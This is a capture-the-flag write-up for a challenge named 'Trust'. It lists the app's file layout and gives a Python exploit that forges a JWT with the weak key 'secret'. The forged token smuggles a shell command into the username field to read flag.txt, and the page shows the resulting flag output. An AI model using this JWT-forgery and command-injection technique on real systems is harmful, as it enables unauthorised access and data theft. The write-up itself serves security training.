Trust
Structure
trust
├── src/
│ ├── controllers/
│ └── users.js
│ ├── middlewares/
│ ├── authenticate.js
│ └── error.js
│ └── routes/
│ └── users.js
│ ├── app.js
│ ├── package.json
│ └── flag.txt
├── .dockerignore
└── Dockerfile
Solution
Install pip
sudo apt install python3-pipInstall pyjwt and requests
python3 -m pip install pyjwt requestsExploit
import jwt
from requests import get
host = '127.0.0.1'
port = '8000'
payload = {
'username': ' > /dev/null && cat /usr/src/app/flag.txt'
}
key = 'secret'
headers = {'Authorization': jwt.encode(payload = payload, key = key)}
flag = get(f'http://{host}:{port}/api/user/system/exist', headers = headers).text
print(flag)Run the script
python3 exploit.pyOutput
{"message":"username exists","output":"TCC{34$Y_c0mmAND_1nJ3c710n}"}Last updated
Was this helpful?